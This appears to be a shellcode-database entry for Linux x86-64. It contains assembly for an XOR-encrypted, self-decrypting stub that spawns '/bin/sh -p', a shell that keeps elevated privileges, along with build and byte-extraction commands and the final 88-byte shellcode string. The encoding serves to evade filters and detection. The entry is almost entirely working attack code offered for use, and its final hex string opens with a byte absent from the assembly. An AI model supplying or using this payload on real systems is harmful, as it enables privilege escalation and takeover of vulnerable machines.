Self-Decrypting XOR Encrypted execve(“/bin/sh”, [“/bin/sh”, “-p”], 0) - Spawn shell maintaining privileges
OS: Linux
Architecture: Intel x86-64
Length: 88 bytes
Assembly
section .text
global _start
_start:
jmp payload ; jump to the "payload" label
decrypt:
pop rdi ; pop the address of the shellcode into rdi
push 0x45 ; push the XOR key 0x45
push 0x31 ; push the loop counter (length of shellcode)
pop rcx ; pop 0x31 into rcx
pop rbx ; pop 0x45 into rbx
sub rsp, rcx ; subtract the length of the shellcode from rsp
xor rax, rax ; null rax
dec_loop:
dec rcx ; decrement rcx by 1
mov al, byte [rdi + rcx] ; move a byte from rdi + rcx into al
xor al, bl ; XOR al against the XOR key in bl
mov byte [rsp + rcx], al ; move the XOR'ed byte from al into rsp + rcx
test rcx, rcx ; check if rcx is 0
jne dec_loop ; if rcx is not 0, continue looping
jmp rsp ; if rcx is 0, jump to the decrypted shellcode
payload:
call decrypt
db 0x0d, 0x74, 0x97, 0x17, 0x0d, 0xfd, 0x6a, 0x27, 0x2c, 0x2b, 0x6a, 0x6a, 0x36, 0x2d, 0x15, 0x0d, 0xcc, 0xa2, 0x0d, 0x74, 0x85, 0x15, 0x23, 0x82, 0x01, 0x61, 0xbb, 0x68, 0x35, 0x0d, 0xc6, 0xa9, 0x47, 0x0d, 0xcc, 0xa6, 0x17, 0x16, 0x12, 0x0d, 0xcc, 0xa3, 0x0d, 0x74, 0x85, 0xf5, 0x7e, 0x4a, 0x40
Compilation and Linking
# Assemble
nasm -f elf64 -o code.o code.asm
# Link
ld -m elf_x86_64 -s -o code code.o
# Extract Shellcode
printf '\\x' && objdump -d code | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n' | sed 's/.\{2\}/&\\x /g'| head -c-3 | tr -d ' ' && echo ' '
Shellcode
\x64\xeb\x1f\x5f\x6a\x45\x6a\x31\x59\x5b\x48\x29\xcc\x48\x31\xc0\x48\xff\xc9\x8a\x04\x0f\x30\xd8\x88\x04\x0c\x48\x85\xc9\x75\xf0\xff\xe4\xe8\xdc\xff\xff\xff\x0d\x74\x97\x17\x0d\xfd\x6a\x27\x2c\x2b\x6a\x6a\x36\x2d\x15\x0d\xcc\xa2\x0d\x74\x85\x15\x23\x82\x01\x61\xbb\x68\x35\x0d\xc6\xa9\x47\x0d\xcc\xa6\x17\x16\x12\x0d\xcc\xa3\x0d\x74\x85\xf5\x7e\x4a\x40